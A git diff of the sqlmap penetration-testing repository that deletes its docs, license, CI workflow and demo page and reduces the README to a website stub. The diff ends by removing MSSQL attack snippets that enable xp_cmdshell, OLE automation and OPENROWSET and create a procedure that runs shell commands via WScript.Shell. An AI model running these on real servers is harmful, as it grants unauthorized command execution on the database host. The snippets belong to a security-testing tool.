diff --git a/.gitattributes b/.gitattributes
deleted file mode 100644
index a99321d231b..00000000000
--- a/.gitattributes
+++ /dev/null
@@ -1,27 +0,0 @@
-*.conf text eol=lf
-*.json text eol=lf
-*.html text eol=lf
-*.md text eol=lf
-*.md5 text eol=lf
-*.pl text eol=lf
-*.py text eol=lf
-*.sh text eol=lf
-*.sql text eol=lf
-*.txt text eol=lf
-*.xml text eol=lf
-*.yaml text eol=lf
-*.yml text eol=lf
-LICENSE text eol=lf
-COMMITMENT text eol=lf
-
-*_ binary
-*.dll binary
-*.pdf binary
-*.so binary
-*.wav binary
-*.zip binary
-*.x32 binary
-*.x64 binary
-*.exe binary
-*.sln binary
-*.vcproj binary
diff --git a/.github/CODE_OF_CONDUCT.md b/.github/CODE_OF_CONDUCT.md
deleted file mode 100644
index 2a36badf3f6..00000000000
--- a/.github/CODE_OF_CONDUCT.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# Contributor Covenant Code of Conduct
-
-## Our Pledge
-
-In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
-
-## Our Standards
-
-Examples of behavior that contributes to creating a positive environment include:
-
-* Using welcoming and inclusive language
-* Being respectful of differing viewpoints and experiences
-* Gracefully accepting constructive criticism
-* Focusing on what is best for the community
-* Showing empathy towards other community members
-
-Examples of unacceptable behavior by participants include:
-
-* The use of sexualized language or imagery and unwelcome sexual attention or advances
-* Trolling, insulting/derogatory comments, and personal or political attacks
-* Public or private harassment
-* Publishing others' private information, such as a physical or electronic address, without explicit permission
-* Other conduct which could reasonably be considered inappropriate in a professional setting
-
-## Our Responsibilities
-
-Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
-
-Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
-
-## Scope
-
-This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
-
-## Enforcement
-
-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
-
-Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
-
-## Attribution
-
-This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
-
-[homepage]: http://contributor-covenant.org
-[version]: http://contributor-covenant.org/version/1/4/
diff --git a/.github/CONTRIBUTING.md b/.github/CONTRIBUTING.md
deleted file mode 100644
index 2ae80685613..00000000000
--- a/.github/CONTRIBUTING.md
+++ /dev/null
@@ -1,36 +0,0 @@
-# Contributing to sqlmap
-
-## Reporting bugs
-
-**Bug reports are welcome**!
-Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
-
-### Guidelines
-
-* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
-* Make sure you can reproduce the bug with the latest development version of sqlmap.
-* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
-* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
-
-## Submitting code changes
-
-All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
-
-Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
-Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
-
-### Guidelines
-
-In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
-
-* Each patch should make one logical change.
-* Avoid tabbing, use four blank spaces instead.
-* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
-* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
-* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
-* Style that is too different from main branch will be ''adapted'' by the developers side.
-* Do not touch anything inside `thirdparty/` and `extra/` folders.
-
-### Licensing
-
-By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
deleted file mode 100644
index e6b299956eb..00000000000
--- a/.github/FUNDING.yml
+++ /dev/null
@@ -1 +0,0 @@
-github: sqlmapproject
diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
deleted file mode 100644
index 0a2d0fe4aea..00000000000
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ /dev/null
@@ -1,37 +0,0 @@
----
-name: Bug report
-about: Create a report to help us improve
-title: ''
-labels: bug report
-assignees: ''
-
----
-
-**Describe the bug**
-A clear and concise description of what the bug is.
-
-**To Reproduce**
-1. Run '...'
-2. See error
-
-**Expected behavior**
-A clear and concise description of what you expected to happen.
-
-**Screenshots**
-If applicable, add screenshots to help explain your problem.
-
-**Running environment:**
- - sqlmap version [e.g. 1.7.2.12#dev]
- - Installation method [e.g. pip]
- - Operating system: [e.g. Microsoft Windows 11]
- - Python version [e.g. 3.11.2]
-
-**Target details:**
- - DBMS [e.g. Microsoft SQL Server]
- - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
- - WAF/IPS [if any]
- - Relevant console output [if any]
- - Exception traceback [if any]
-
-**Additional context**
-Add any other context about the problem here.
diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md
deleted file mode 100644
index e301d68ce74..00000000000
--- a/.github/ISSUE_TEMPLATE/feature_request.md
+++ /dev/null
@@ -1,20 +0,0 @@
----
-name: Feature request
-about: Suggest an idea for this project
-title: ''
-labels: feature request
-assignees: ''
-
----
-
-**Is your feature request related to a problem? Please describe.**
-A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
-
-**Describe the solution you'd like**
-A clear and concise description of what you want to happen.
-
-**Describe alternatives you've considered**
-A clear and concise description of any alternative solutions or features you've considered.
-
-**Additional context**
-Add any other context or screenshots about the feature request here.
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
deleted file mode 100644
index 0ecd5cd3fbc..00000000000
--- a/.github/workflows/tests.yml
+++ /dev/null
@@ -1,28 +0,0 @@
-on:
- push:
- branches: [ master ]
- pull_request:
- branches: [ master ]
-
-jobs:
- build:
- runs-on: ${{ matrix.os }}
- strategy:
- matrix:
- os: [ubuntu-latest, macos-latest, windows-latest]
- python-version: [ 'pypy-2.7', '3.13' ]
- exclude:
- - os: macos-latest
- python-version: 'pypy-2.7'
- steps:
- - uses: actions/checkout@v2
- - name: Set up Python
- uses: actions/setup-python@v2
- with:
- python-version: ${{ matrix.python-version }}
- - name: Basic import test
- run: python -c "import sqlmap; import sqlmapapi"
- - name: Smoke test
- run: python sqlmap.py --smoke
- - name: Vuln test
- run: python sqlmap.py --vuln
diff --git a/.gitignore b/.gitignore
deleted file mode 100644
index 1f7f94a3b1e..00000000000
--- a/.gitignore
+++ /dev/null
@@ -1,8 +0,0 @@
-output/
-__pycache__/
-*.py[cod]
-.sqlmap_history
-traffic.txt
-*~
-req*.txt
-.idea/
\ No newline at end of file
diff --git a/CNAME b/CNAME
new file mode 100644
index 00000000000..be9bef93044
--- /dev/null
+++ b/CNAME
@@ -0,0 +1 @@
+sqlmap.org
diff --git a/LICENSE b/LICENSE
deleted file mode 100644
index 4973329375b..00000000000
--- a/LICENSE
+++ /dev/null
@@ -1,348 +0,0 @@
-COPYING -- Describes the terms under which sqlmap is distributed. A copy
-of the GNU General Public License (GPL) is appended to this file.
-
-sqlmap is (C) 2006-2025 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
-
-This program is free software; you may redistribute and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation; Version 2 (or later) with the clarifications and
-exceptions described below. This guarantees your right to use, modify, and
-redistribute this software under certain conditions. If you wish to embed
-sqlmap technology into proprietary software, we sell alternative licenses
-(contact sales@sqlmap.org).
-
-Note that the GPL places important restrictions on "derived works", yet it
-does not provide a detailed definition of that term. To avoid
-misunderstandings, we interpret that term as broadly as copyright law
-allows. For example, we consider an application to constitute a "derived
-work" for the purpose of this license if it does any of the following:
-* Integrates source code from sqlmap.
-* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml
-* Executes sqlmap and parses the results (as opposed to typical shell or
- execution-menu apps, which simply display raw sqlmap output and so are
- not derivative works).
-* Integrates/includes/aggregates sqlmap into a proprietary executable
- installer, such as those produced by InstallShield.
-* Links to a library or executes a program that does any of the above
-
-The term "sqlmap" should be taken to also include any portions or derived
-works of sqlmap. This list is not exclusive, but is meant to clarify our
-interpretation of derived works with some common examples. Our
-interpretation applies only to sqlmap - we do not speak for other people's
-GPL works.
-
-This license does not apply to the third-party components. More details can
-be found inside the file 'doc/THIRD-PARTY.md'.
-
-If you have any questions about the GPL licensing restrictions on using
-sqlmap in non-GPL works, we would be happy to help. As mentioned above,
-we also offer alternative license to integrate sqlmap into proprietary
-applications and appliances.
-
-If you received these files with a written license agreement or contract
-stating terms other than the terms above, then that alternative license
-agreement takes precedence over these comments.
-
-Source is provided to this software because we believe users have a right
-to know exactly what a program is going to do before they run it.
-
-Source code also allows you to fix bugs and add new features. You are
-highly encouraged to send your changes to dev@sqlmap.org for possible
-incorporation into the main distribution. By sending these changes to the
-sqlmap developers or via Git pull request, checking them into the sqlmap
-source code repository, it is understood (unless you specify otherwise)
-that you are offering the sqlmap project the unlimited, non-exclusive
-right to reuse, modify, and relicense the code. sqlmap will always be
-available Open Source, but this is important because the inability to
-relicense code has caused devastating problems for other Free Software
-projects (such as KDE and NASM). If you wish to specify special license
-conditions of your contributions, just say so when you send them.
-
-This program is distributed in the hope that it will be useful, but
-WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-General Public License v2.0 for more details at
-http://www.gnu.org/licenses/gpl-2.0.html, or below
-
-****************************************************************************
-
- GNU GENERAL PUBLIC LICENSE
- Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
- Preamble
-
- The licenses for most software are designed to take away your
-freedom to share and change it. By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users. This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it. (Some other Free Software Foundation software is covered by
-the GNU Lesser General Public License instead.) You can apply it to
-your programs, too.
-
- When we speak of free software, we are referring to freedom, not
-price. Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
- To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
- For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have. You must make sure that they, too, receive or can get the
-source code. And you must show them these terms so they know their
-rights.
-
- We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
- Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software. If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
- Finally, any free program is threatened constantly by software
-patents. We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary. To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
- The precise terms and conditions for copying, distribution and
-modification follow.
-
- GNU GENERAL PUBLIC LICENSE
- TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
- 0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License. The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language. (Hereinafter, translation is included without limitation in
-the term "modification".) Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope. The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
- 1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
- 2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
- a) You must cause the modified files to carry prominent notices
- stating that you changed the files and the date of any change.
-
- b) You must cause any work that you distribute or publish, that in
- whole or in part contains or is derived from the Program or any
- part thereof, to be licensed as a whole at no charge to all third
- parties under the terms of this License.
-
- c) If the modified program normally reads commands interactively
- when run, you must cause it, when started running for such
- interactive use in the most ordinary way, to print or display an
- announcement including an appropriate copyright notice and a
- notice that there is no warranty (or else, saying that you provide
- a warranty) and that users may redistribute the program under
- these conditions, and telling the user how to view a copy of this
- License. (Exception: if the Program itself is interactive but
- does not normally print such an announcement, your work based on
- the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole. If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works. But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
- 3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
- a) Accompany it with the complete corresponding machine-readable
- source code, which must be distributed under the terms of Sections
- 1 and 2 above on a medium customarily used for software interchange; or,
-
- b) Accompany it with a written offer, valid for at least three
- years, to give any third party, for a charge no more than your
- cost of physically performing source distribution, a complete
- machine-readable copy of the corresponding source code, to be
- distributed under the terms of Sections 1 and 2 above on a medium
- customarily used for software interchange; or,
-
- c) Accompany it with the information you received as to the offer
- to distribute corresponding source code. (This alternative is
- allowed only for noncommercial distribution and only if you
- received the program in object code or executable form with such
- an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it. For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable. However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
- 4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License. Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
- 5. You are not required to accept this License, since you have not
-signed it. However, nothing else grants you permission to modify or
-distribute the Program or its derivative works. These actions are
-prohibited by law if you do not accept this License. Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
- 6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions. You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
- 7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License. If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all. For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices. Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
- 8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded. In such case, this License incorporates
-the limitation as if written in the body of this License.
-
- 9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time. Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number. If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation. If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
- 10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission. For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this. Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
- NO WARRANTY
-
- 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
- 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
- END OF TERMS AND CONDITIONS
diff --git a/README.md b/README.md
index b569265e063..d7f70ae0026 100644
--- a/README.md
+++ b/README.md
@@ -1,80 +1 @@
-# sqlmap 
-
-[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
-
-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
-
-Screenshots
-----
-
-
-
-You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.
-
-Installation
-----
-
-You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
-
-Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
-
- git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-
-sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.
-
-Usage
-----
-
-To get a list of basic options and switches use:
-
- python sqlmap.py -h
-
-To get a list of all options and switches use:
-
- python sqlmap.py -hh
-
-You can find a sample run [here](https://asciinema.org/a/46601).
-To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
-
-Links
-----
-
-* Homepage: https://sqlmap.org
-* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
-* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
-* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
-* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
-* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* X: [@sqlmap](https://x.com/sqlmap)
-* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
-* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
-
-Translations
-----
-
-* [Arabic](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ar-AR.md)
-* [Bengali](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bn-BD.md)
-* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
-* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
-* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
-* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
-* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
-* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
-* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
-* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
-* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
-* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
-* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
-* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
-* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
-* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md)
-* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
-* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
-* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
-* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
-* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
-* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
-* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
-* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
-* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
-* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
+sqlmap.org website
diff --git a/data/html/index.html b/data/html/index.html
deleted file mode 100644
index 576f2763b8c..00000000000
--- a/data/html/index.html
+++ /dev/null
@@ -1,151 +0,0 @@
-
-
-
-
-
-
- DEMO
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
DEMO
-
-
-
-
-
-
-
-
diff --git a/data/procs/README.txt b/data/procs/README.txt
deleted file mode 100644
index c693f0630ff..00000000000
--- a/data/procs/README.txt
+++ /dev/null
@@ -1,4 +0,0 @@
-Files in this folder represent SQL snippets used by sqlmap on the target
-system.
-They are licensed under the terms of the GNU Lesser General Public License
-where not specified otherwise.
diff --git a/data/procs/mssqlserver/activate_sp_oacreate.sql b/data/procs/mssqlserver/activate_sp_oacreate.sql
deleted file mode 100644
index 753efb71a09..00000000000
--- a/data/procs/mssqlserver/activate_sp_oacreate.sql
+++ /dev/null
@@ -1,4 +0,0 @@
-EXEC master..sp_configure 'show advanced options',1;
-RECONFIGURE WITH OVERRIDE;
-EXEC master..sp_configure 'ole automation procedures',1;
-RECONFIGURE WITH OVERRIDE
diff --git a/data/procs/mssqlserver/configure_openrowset.sql b/data/procs/mssqlserver/configure_openrowset.sql
deleted file mode 100644
index 5f3d6d827b9..00000000000
--- a/data/procs/mssqlserver/configure_openrowset.sql
+++ /dev/null
@@ -1,6 +0,0 @@
-EXEC master..sp_configure 'show advanced options', 1;
-RECONFIGURE WITH OVERRIDE;
-EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
-RECONFIGURE WITH OVERRIDE;
-EXEC sp_configure 'show advanced options', 0;
-RECONFIGURE WITH OVERRIDE
diff --git a/data/procs/mssqlserver/configure_xp_cmdshell.sql b/data/procs/mssqlserver/configure_xp_cmdshell.sql
deleted file mode 100644
index e23e4b06a48..00000000000
--- a/data/procs/mssqlserver/configure_xp_cmdshell.sql
+++ /dev/null
@@ -1,6 +0,0 @@
-EXEC master..sp_configure 'show advanced options',1;
-RECONFIGURE WITH OVERRIDE;
-EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
-RECONFIGURE WITH OVERRIDE;
-EXEC master..sp_configure 'show advanced options',0;
-RECONFIGURE WITH OVERRIDE
diff --git a/data/procs/mssqlserver/create_new_xp_cmdshell.sql b/data/procs/mssqlserver/create_new_xp_cmdshell.sql
deleted file mode 100644
index 005730860fa..00000000000
--- a/data/procs/mssqlserver/create_new_xp_cmdshell.sql
+++ /dev/null
@@ -1,3 +0,0 @@
-DECLARE @%RANDSTR% nvarchar(999);
-set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
-EXEC master..sp_executesql @%RANDSTR%
diff --git a/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
deleted file mode 100644
index 379f6517f65..00000000000
